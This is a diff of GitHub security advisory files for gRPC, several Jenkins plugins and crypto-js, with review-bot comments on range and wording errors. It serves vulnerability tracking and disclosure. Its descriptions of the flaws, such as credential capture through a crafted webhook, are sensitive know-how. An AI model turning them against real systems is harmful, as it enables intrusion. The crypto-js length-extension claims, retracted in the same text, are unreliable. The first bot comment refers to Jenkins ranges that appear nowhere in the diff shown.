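Review bot: The two `affected` ranges appear to contradict the `details` string: the text says every release up to 396.v86ce29279947 is affected "except 378.380.v545b_1154b_3fb_", yet the second range ends with `"fixed": "378.vd6e2874a"` (clearing a release the prose counts as affected) while the first range starts with `"introduced": "378.380.v545b"`, an inclusive lower bound that pulls the one excepted backport into the vulnerable set. The `introduced` value is also a truncated prefix of the version named in the details, so a matcher may not even compare it as the same release. Proposed: make the excepted backport the exclusive upper bound of the lower range, `"fixed": "378.380.v545b_1154b_3fb_"`, and set the upper range's `introduced` to the first affected release after it, `"introduced": "<first-affected-release-after-378.380>"`, once that version is confirmed against the Jenkins advisory.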
diff --git a/advisories/github-reviewed/2023/09/GHSA-p25m-jpj4-qcrr/GHSA-p25m-jpj4-qcrr.json b/advisories/github-reviewed/2023/09/GHSA-p25m-jpj4-qcrr/GHSA-p25m-jpj4-qcrr.json new file mode 100644 index 0000000000000..3506e96e652b7 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-p25m-jpj4-qcrr/GHSA-p25m-jpj4-qcrr.json 
@@ -0,0 +1,207 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p25m-jpj4-qcrr", + "modified": "2024-02-02T20:42:27Z", + "published": "2023-09-13T18:31:26Z", + "aliases": [ + "CVE-2023-4785" + ], + "summary": "Denial of Service Vulnerability in gRPC TCP Server (Posix-compatible platforms)", + "details": "Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++ Python, and Ruby are affected, but gRPC Java, and Go are NOT affected. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "RubyGems", + "name": "grpc" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.56.0" + }, + { + "fixed": "1.56.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "RubyGems", + "name": "grpc" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.55.0" + }, + { + "fixed": "1.55.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "RubyGems", + "name": "grpc" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.54.0" + }, + { + "fixed": "1.54.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "RubyGems", + "name": "grpc" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.53.0" + }, + { + "fixed": "1.53.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "grpcio" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.55.0" + }, + { + "fixed": "1.55.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "grpcio" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.54.0" + }, + { + "fixed": "1.54.3" + } + ] + } + ] + }, + { + "package": { + 
"ecosystem": "PyPI", + "name": "grpcio" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.53.0" + }, + { + "fixed": "1.53.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4785" + }, + { + "type": "WEB", + "url": "https://github.com/grpc/grpc/pull/33656" + }, + { + "type": "WEB", + "url": "https://github.com/grpc/grpc/pull/33667" + }, + { + "type": "WEB", + "url": "https://github.com/grpc/grpc/pull/33669" + }, + { + "type": "WEB", + "url": "https://github.com/grpc/grpc/pull/33670" + }, + { + "type": "WEB", + "url": "https://github.com/grpc/grpc/pull/33672" + }, + { + "type": "WEB", + "url": "https://groups.google.com/g/grpc-io/c/LlLkB1CeE4U" + }, + { + "type": "WEB", + "url": "https://rubygems.org/gems/grpc/versions/1.53.2" + }, + { + "type": "WEB", + "url": "https://rubygems.org/gems/grpc/versions/1.54.3" + }, + { + "type": "WEB", + "url": "https://rubygems.org/gems/grpc/versions/1.55.3" + }, + { + "type": "WEB", + "url": "https://rubygems.org/gems/grpc/versions/1.56.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-248" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T20:42:27Z", + "nvd_published_at": "2023-09-13T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-p986-hpr3-493p/GHSA-p986-hpr3-493p.json b/advisories/github-reviewed/2023/09/GHSA-p986-hpr3-493p/GHSA-p986-hpr3-493p.json new file mode 100644 index 0000000000000..a3bb4c68aae81 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-p986-hpr3-493p/GHSA-p986-hpr3-493p.json 
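Review bot: The affected ranges do not cover what the details claim: the text says the flaw exists "starting version 1.23", yet the lowest `introduced` event for both `grpc` and `grpcio` is `1.53.0`, so a matcher would report 1.23.x through 1.52.x as clean. The RubyGems `grpc` entries include a fourth range `1.56.0` → `1.56.2`, but there is no PyPI `grpcio` counterpart even though the details name Python as affected; either grpcio 1.56.x is unaffected (which the text does not say) or an entry is missing. If the 1.23 statement is accurate, change the two 1.53 ranges to `"introduced": "1.23.0"` (or state in the details that only the 1.53+ branches received fixes), and add a `grpcio` entry mirroring the RubyGems 1.56 range with `"fixed": "<grpcio 1.56 fix version>"` filled in from the release. The details string also reads `gRPC C++ Python, and Ruby`, missing the comma after C++.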
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p986-hpr3-493p", + "modified": "2024-01-30T23:01:54Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41947" + ], + "summary": "Missing permission checks in Jenkins Frugal Testing Plugin", + "details": "A missing permission check in Jenkins Frugal Testing Plugin 1.1 and earlier allows attackers with Overall/Read permission to connect to Frugal Testing using attacker-specified credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.jenkins.plugins:frugal-testing" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41947" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3082" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:01:54Z", + "nvd_published_at": "2023-09-06T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-pfg6-cj3j-rpv4/GHSA-pfg6-cj3j-rpv4.json b/advisories/github-reviewed/2023/09/GHSA-pfg6-cj3j-rpv4/GHSA-pfg6-cj3j-rpv4.json new file mode 100644 index 0000000000000..036eeb42546c5 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-pfg6-cj3j-rpv4/GHSA-pfg6-cj3j-rpv4.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pfg6-cj3j-rpv4", + "modified": "2024-01-30T23:19:45Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41941" + ], + "summary": "Missing permission check in Jenkins AWS CodeCommit Trigger Plugin allows enumerating credentials IDs", + "details": "A missing permission check in Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of AWS credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:aws-codecommit-trigger" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.0.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41941" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3101%20(1)" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:19:45Z", + "nvd_published_at": "2023-09-06T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-qf42-f5vf-6w99/GHSA-qf42-f5vf-6w99.json b/advisories/github-reviewed/2023/09/GHSA-qf42-f5vf-6w99/GHSA-qf42-f5vf-6w99.json new file mode 100644 index 0000000000000..bdfbd2be72b83 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-qf42-f5vf-6w99/GHSA-qf42-f5vf-6w99.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qf42-f5vf-6w99", + "modified": "2024-01-30T23:01:31Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41945" + ], + "summary": "Disabled permissions granted by Jenkins Assembla Auth Plugin", + "details": "Jenkins Assembla Auth Plugin 1.14 and earlier does not verify that the permissions it grants are enabled, resulting in users with EDIT permissions to be granted Overall/Manage and Overall/SystemRead permissions, even if those permissions are disabled and should not be granted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:assembla-auth" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41945" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3065" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:01:31Z", + "nvd_published_at": "2023-09-06T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-qqvq-6xgj-jw8g/GHSA-qqvq-6xgj-jw8g.json b/advisories/github-reviewed/2023/09/GHSA-qqvq-6xgj-jw8g/GHSA-qqvq-6xgj-jw8g.json index 5f82dafd171cb..af3ff16ec6fed 100644 --- a/advisories/github-reviewed/2023/09/GHSA-qqvq-6xgj-jw8g/GHSA-qqvq-6xgj-jw8g.json +++ b/advisories/github-reviewed/2023/09/GHSA-qqvq-6xgj-jw8g/GHSA-qqvq-6xgj-jw8g.json 
@@ -244,6 +244,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202310-04" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://stackdiary.com/google-discloses-a-webm-vp8-bug-tracked-as-cve-2023-5217/" diff --git a/advisories/github-reviewed/2023/09/GHSA-r428-g373-m2h4/GHSA-r428-g373-m2h4.json b/advisories/github-reviewed/2023/09/GHSA-r428-g373-m2h4/GHSA-r428-g373-m2h4.json new file mode 100644 index 0000000000000..0cb580a4d6851 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-r428-g373-m2h4/GHSA-r428-g373-m2h4.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r428-g373-m2h4", + "modified": "2024-01-30T23:19:34Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41943" + ], + "summary": "Missing permission check in Jenkins AWS CodeCommit Trigger Plugin ", + "details": "Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to clear the SQS queue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:aws-codecommit-trigger" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.0.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41943" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3101%20(2)" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:19:34Z", + "nvd_published_at": "2023-09-06T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-vrpg-c7c4-8mpx/GHSA-vrpg-c7c4-8mpx.json b/advisories/github-reviewed/2023/09/GHSA-vrpg-c7c4-8mpx/GHSA-vrpg-c7c4-8mpx.json new file mode 100644 index 0000000000000..4a7429baeceeb --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-vrpg-c7c4-8mpx/GHSA-vrpg-c7c4-8mpx.json 
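Review bot: The `summary` value ends with a trailing space, `"Missing permission check in Jenkins AWS CodeCommit Trigger Plugin "`, which the sibling Jenkins advisories in this commit do not have and which is reproduced verbatim in alert titles; trim it to `"summary": "Missing permission check in Jenkins AWS CodeCommit Trigger Plugin",`. Since the companion advisory for the same plugin (GHSA-pfg6-cj3j-rpv4) qualifies its summary with the impact, the same could be done here from the details, e.g. `"summary": "Missing permission check in Jenkins AWS CodeCommit Trigger Plugin allows clearing the SQS queue",`.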
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrpg-c7c4-8mpx", + "modified": "2024-01-30T23:07:57Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41937" + ], + "summary": "SSRF vulnerability in Jenkins Bitbucket Push and Pull Request Plugin allows capturing credentials", + "details": "Jenkins Bitbucket Push and Pull Request Plugin 2.4.0 through 2.8.3 (both inclusive) trusts values provided in the webhook payload, including certain URLs, and uses configured Bitbucket credentials to connect to those URLs, allowing attackers to capture Bitbucket credentials stored in Jenkins by sending a crafted webhook payload.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.jenkins.plugins:bitbucket-push-and-pull-request" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.8.4" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.8.3" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41937" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3165" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:07:57Z", + "nvd_published_at": "2023-09-06T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/10/GHSA-j6h5-ggv2-3rfv/GHSA-j6h5-ggv2-3rfv.json b/advisories/github-reviewed/2023/10/GHSA-j6h5-ggv2-3rfv/GHSA-j6h5-ggv2-3rfv.json index 4674e2be5664b..17ada8011d34b 100644 --- a/advisories/github-reviewed/2023/10/GHSA-j6h5-ggv2-3rfv/GHSA-j6h5-ggv2-3rfv.json 
+++ b/advisories/github-reviewed/2023/10/GHSA-j6h5-ggv2-3rfv/GHSA-j6h5-ggv2-3rfv.json @@ -40,6 +40,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44764" }, + { + "type": "WEB", + "url": "https://documentation.concretecms.org/developers/introduction/version-history/923-release-notes" + }, { "type": "PACKAGE", "url": "https://github.com/concretecms/concretecms/" diff --git a/advisories/github-reviewed/2023/10/GHSA-xwcq-pm8m-c4vf/GHSA-xwcq-pm8m-c4vf.json b/advisories/github-reviewed/2023/10/GHSA-xwcq-pm8m-c4vf/GHSA-xwcq-pm8m-c4vf.json index b93ba9b153b42..b9e2e6ad4b7e7 100644 --- a/advisories/github-reviewed/2023/10/GHSA-xwcq-pm8m-c4vf/GHSA-xwcq-pm8m-c4vf.json +++ b/advisories/github-reviewed/2023/10/GHSA-xwcq-pm8m-c4vf/GHSA-xwcq-pm8m-c4vf.json 
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-xwcq-pm8m-c4vf", - "modified": "2023-11-27T21:30:52Z", + "modified": "2024-02-01T16:30:29Z", "published": "2023-10-25T21:15:52Z", "aliases": [ "CVE-2023-46233" ], "summary": "crypto-js PBKDF2 1,000 times weaker than specified in 1993 and 1.3M times weaker than current standard", - "details": "### Impact\n#### Summary\nCrypto-js PBKDF2 is 1,000 times weaker than originally specified in 1993, and [at least 1,300,000 times weaker than current industry standard][OWASP PBKDF2 Cheatsheet]. This is because it both (1) defaults to [SHA1][SHA1 wiki], a cryptographic hash algorithm considered insecure [since at least 2005][Cryptanalysis of SHA-1] and (2) defaults to [one single iteration][one iteration src], a 'strength' or 'difficulty' value specified at 1,000 when specified in 1993. PBKDF2 relies on iteration count as a countermeasure to [preimage][preimage attack] and [collision][collision attack] attacks.\n\nPotential Impact:\n\n1. If used to protect passwords, the impact is high.\n2. If used to generate signatures, the impact is high.\n\nProbability / risk analysis / attack enumeration:\n\n1. [For at most $45,000][SHA1 is a Shambles], an attacker, given control of only the beginning of a crypto-js PBKDF2 input, can create a value which has _identical cryptographic signature_ to any chosen known value.\n4. Due to the [length extension attack] on SHA1, we can create a value that has identical signature to any _unknown_ value, provided it is prefixed by a known value. It does not matter if PBKDF2 applies '[salt][cryptographic salt]' or '[pepper][cryptographic pepper]' or any other secret unknown to the attacker. 
It will still create an identical signature.\n\n[cryptographic salt]: https://en.wikipedia.org/wiki/Salt_(cryptography) \"Salt (cryptography), Wikipedia\"\n[cryptographic pepper]: https://en.wikipedia.org/wiki/Pepper_(cryptography) \"Pepper (cryptography), Wikipedia\"\n[SHA1 wiki]: https://en.wikipedia.org/wiki/SHA-1 \"SHA-1, Wikipedia\"\n[Cryptanalysis of SHA-1]: https://www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html \"Cryptanalysis of SHA-1\"\n[one iteration src]: https://github.com/brix/crypto-js/blob/1da3dabf93f0a0435c47627d6f171ad25f452012/src/pbkdf2.js#L22-L26 \"crypto-js/src/pbkdf2.js lines 22-26\"\n[collision attack]: https://en.wikipedia.org/wiki/Hash_collision \"Collision Attack, Wikipedia\"\n[preimage attack]: https://en.wikipedia.org/wiki/Preimage_attack \"Preimage Attack, Wikipedia\"\n[SHA1 is a Shambles]: https://eprint.iacr.org/2020/014.pdf \"SHA-1 is a Shambles: First Chosen-Prefix Collision on SHA-1\nand Application to the PGP Web of Trust, Gaëtan Leurent and Thomas Peyrin\"\n[Length Extension attack]: https://en.wikipedia.org/wiki/Length_extension_attack \"Length extension attack, Wikipedia\"\n\ncrypto-js has 10,642 public users [as displayed on NPM][crypto-js, NPM], today October 11th 2023. 
The number of transient dependents is likely several orders of magnitude higher.\n\nA very rough GitHub search[ shows 432 files][GitHub search: affected files] cross GitHub using PBKDF2 in crypto-js in Typescript or JavaScript, but not specifying any number of iterations.\n\n[OWASP PBKDF2 Cheatsheet]: https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html#pbkdf2 \"OWASP PBKDF2 Cheatsheet\"\n[crypto-js, NPM]: https://www.npmjs.com/package/crypto-js \"crypto-js on NPM\"\n[GitHub search: affected files]: https://github.com/search?q=%22crypto-js%22+AND+pbkdf2+AND+%28lang%3AJavaScript+OR+lang%3ATypeScript%29++NOT+%22iterations%22&type=code&p=2 \"GitHub search: crypto-js AND pbkdf2 AND (lang:JavaScript OR lang:TypeScript) NOT iterations\"\n\n#### Affected versions\nAll versions are impacted. This code has been the same since crypto-js was first created.\n\n#### Further Cryptanalysis\n\nThe issue here is especially egregious because the length extension attack makes useless any secret that might be appended to the plaintext before calculating its signature.\n\nConsider a scheme in which a secret is created for a user's username, and that secret is used to protect e.g. their passwords. Let's say that password is 'fake-password', and their username is 'example-username'.\n\nTo encrypt the user password via symmetric encryption we might do `encrypt(plaintext: 'fake-password', encryption_key: cryptojs.pbkdf2(value: 'example username' + salt_or_pepper))`. By this means, we would, in theory, create an `encryption_key` that can be determined from the public username, but which requires the secret `salt_or_pepper` to generate. This is a common scheme for protecting passwords, as exemplified in bcrypt & scrypt. 
Because the encryption key is symmetric, we can use this derived key to also decrypt the ciphertext.\n\nBecause of the length extension issue, if the attacker obtains (via attack 1), a collision with 'example username', the attacker _does not need to know_ `salt_or_pepper` to decrypt their account data, only their public username.\n\n### Description\n\nPBKDF2 is a key-derivation is a key-derivation function that is used for two main purposes: (1) to stretch or squash a variable length password's entropy into a fixed size for consumption by another cryptographic operation and (2) to reduce the chance of downstream operations recovering the password input (for example, for password storage).\n\nUnlike the modern [webcrypto](https://w3c.github.io/webcrypto/#pbkdf2-operations) standard, crypto-js does not throw an error when a number of iterations is not specified, and defaults to one single iteration. In the year 2000, when PBKDF2 was originally specified, the minimum number of iterations suggested was set at 1,000. Today, [OWASP recommends 1,300,000][OWASP PBKDF2 Cheatsheet]:\n\nhttps://github.com/brix/crypto-js/blob/4dcaa7afd08f48cd285463b8f9499cdb242605fa/src/pbkdf2.js#L22-L26\n\n### Patches\nNo available patch. The package is not maintained.\n\n### Workarounds\nConsult the [OWASP PBKDF2 Cheatsheet]. Configure to use SHA256 with at least 250,000 iterations.\n\n### Coordinated disclosure\nThis issue was simultaneously submitted to [crypto-js](https://github.com/brix/crypto-js) and [crypto-es](https://github.com/entronad/crypto-es) on the 23rd of October 2023.\n\n### Caveats\n\nThis issue was found in a security review that was _not_ scoped to crypto-js. 
This report is not an indication that crypto-js has undergone a formal security assessment by the author.\n\n", + "details": "### Impact\n#### Summary\nCrypto-js PBKDF2 is 1,000 times weaker than originally specified in 1993, and [at least 1,300,000 times weaker than current industry standard][OWASP PBKDF2 Cheatsheet]. This is because it both (1) defaults to [SHA1][SHA1 wiki], a cryptographic hash algorithm considered insecure [since at least 2005][Cryptanalysis of SHA-1] and (2) defaults to [one single iteration][one iteration src], a 'strength' or 'difficulty' value specified at 1,000 when specified in 1993. PBKDF2 relies on iteration count as a countermeasure to [preimage][preimage attack] and [collision][collision attack] attacks.\n\nPotential Impact:\n\n1. If used to protect passwords, the impact is high.\n2. If used to generate signatures, the impact is high.\n\nProbability / risk analysis / attack enumeration:\n\n1. [For at most $45,000][SHA1 is a Shambles], an attacker, given control of only the beginning of a crypto-js PBKDF2 input, can create a value which has _identical cryptographic signature_ to any chosen known value.\n4. Due to the [length extension attack] on SHA1, we can create a value that has identical signature to any _unknown_ value, provided it is prefixed by a known value. It does not matter if PBKDF2 applies '[salt][cryptographic salt]' or '[pepper][cryptographic pepper]' or any other secret unknown to the attacker. It will still create an identical signature.\n\nUpdate: PBKDF2 requires a pseudo-random function that takes two inputs, so HMAC-SHA1 is used rather than plain SHA1. HMAC is not affected by [length extension attacks][Length Extension attack]. However, by defaulting to a single PBKDF2 iteration, the hashes do not benefit from the extra computational complexity that PBKDF2 is supposed to provide. 
The resulting hashes therefore have little protection against an offline brute-force attack.\n \n[cryptographic salt]: https://en.wikipedia.org/wiki/Salt_(cryptography) \"Salt (cryptography), Wikipedia\"\n[cryptographic pepper]: https://en.wikipedia.org/wiki/Pepper_(cryptography) \"Pepper (cryptography), Wikipedia\"\n[SHA1 wiki]: https://en.wikipedia.org/wiki/SHA-1 \"SHA-1, Wikipedia\"\n[Cryptanalysis of SHA-1]: https://www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html \"Cryptanalysis of SHA-1\"\n[one iteration src]: https://github.com/brix/crypto-js/blob/1da3dabf93f0a0435c47627d6f171ad25f452012/src/pbkdf2.js#L22-L26 \"crypto-js/src/pbkdf2.js lines 22-26\"\n[collision attack]: https://en.wikipedia.org/wiki/Hash_collision \"Collision Attack, Wikipedia\"\n[preimage attack]: https://en.wikipedia.org/wiki/Preimage_attack \"Preimage Attack, Wikipedia\"\n[SHA1 is a Shambles]: https://eprint.iacr.org/2020/014.pdf \"SHA-1 is a Shambles: First Chosen-Prefix Collision on SHA-1\nand Application to the PGP Web of Trust, Gaëtan Leurent and Thomas Peyrin\"\n[Length Extension attack]: https://en.wikipedia.org/wiki/Length_extension_attack \"Length extension attack, Wikipedia\"\n\ncrypto-js has 10,642 public users [as displayed on NPM][crypto-js, NPM], today October 11th 2023. 
The number of transient dependents is likely several orders of magnitude higher.\n\nA very rough GitHub search[ shows 432 files][GitHub search: affected files] cross GitHub using PBKDF2 in crypto-js in Typescript or JavaScript, but not specifying any number of iterations.\n\n[OWASP PBKDF2 Cheatsheet]: https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html#pbkdf2 \"OWASP PBKDF2 Cheatsheet\"\n[crypto-js, NPM]: https://www.npmjs.com/package/crypto-js \"crypto-js on NPM\"\n[GitHub search: affected files]: https://github.com/search?q=%22crypto-js%22+AND+pbkdf2+AND+%28lang%3AJavaScript+OR+lang%3ATypeScript%29++NOT+%22iterations%22&type=code&p=2 \"GitHub search: crypto-js AND pbkdf2 AND (lang:JavaScript OR lang:TypeScript) NOT iterations\"\n\n#### Affected versions\nAll versions are impacted. This code has been the same since crypto-js was first created.\n\n#### Further Cryptanalysis\n\nThe issue here is especially egregious because the length extension attack makes useless any secret that might be appended to the plaintext before calculating its signature.\n\nConsider a scheme in which a secret is created for a user's username, and that secret is used to protect e.g. their passwords. Let's say that password is 'fake-password', and their username is 'example-username'.\n\nTo encrypt the user password via symmetric encryption we might do `encrypt(plaintext: 'fake-password', encryption_key: cryptojs.pbkdf2(value: 'example username' + salt_or_pepper))`. By this means, we would, in theory, create an `encryption_key` that can be determined from the public username, but which requires the secret `salt_or_pepper` to generate. This is a common scheme for protecting passwords, as exemplified in bcrypt & scrypt. 
Because the encryption key is symmetric, we can use this derived key to also decrypt the ciphertext.\n\nBecause of the length extension issue, if the attacker obtains (via attack 1), a collision with 'example username', the attacker _does not need to know_ `salt_or_pepper` to decrypt their account data, only their public username.\n\n### Description\n\nPBKDF2 is a key-derivation is a key-derivation function that is used for two main purposes: (1) to stretch or squash a variable length password's entropy into a fixed size for consumption by another cryptographic operation and (2) to reduce the chance of downstream operations recovering the password input (for example, for password storage).\n\nUnlike the modern [webcrypto](https://w3c.github.io/webcrypto/#pbkdf2-operations) standard, crypto-js does not throw an error when a number of iterations is not specified, and defaults to one single iteration. In the year 2000, when PBKDF2 was originally specified, the minimum number of iterations suggested was set at 1,000. Today, [OWASP recommends 1,300,000][OWASP PBKDF2 Cheatsheet]:\n\nhttps://github.com/brix/crypto-js/blob/4dcaa7afd08f48cd285463b8f9499cdb242605fa/src/pbkdf2.js#L22-L26\n\n### Patches\nNo available patch. The package is not maintained.\n\n### Workarounds\nConsult the [OWASP PBKDF2 Cheatsheet]. Configure to use SHA256 with at least 250,000 iterations.\n\n### Coordinated disclosure\nThis issue was simultaneously submitted to [crypto-js](https://github.com/brix/crypto-js) and [crypto-es](https://github.com/entronad/crypto-es) on the 23rd of October 2023.\n\n### Caveats\n\nThis issue was found in a security review that was _not_ scoped to crypto-js. This report is not an indication that crypto-js has undergone a formal security assessment by the author.\n\n", "severity": [ { "type": "CVSS_V3", 
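Review bot: The new `Update:` paragraph states that PBKDF2 uses HMAC-SHA1 and that HMAC is not subject to length extension, but the passages it corrects are kept unchanged: item 4 of the attack enumeration, the `#### Further Cryptanalysis` section ("the length extension attack makes useless any secret…") and the collision-based decryption scenario still present the retracted reasoning as fact, so the advisory now argues both sides. Either rewrite those sections around the actual weakness the update identifies (a default of one iteration, with SHA-1 as the underlying hash) or prefix each with a short lead-in such as `_(Superseded — see Update above.)_`; the same caveat arguably applies to item 1, since a chosen-prefix SHA-1 collision does not by itself yield an HMAC-SHA1 forgery. Two pre-existing wording defects are worth fixing while the string is being edited: `PBKDF2 is a key-derivation is a key-derivation function` duplicates a phrase, and the summary's "specified in 1993" conflicts with the Description's "In the year 2000, when PBKDF2 was originally specified".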
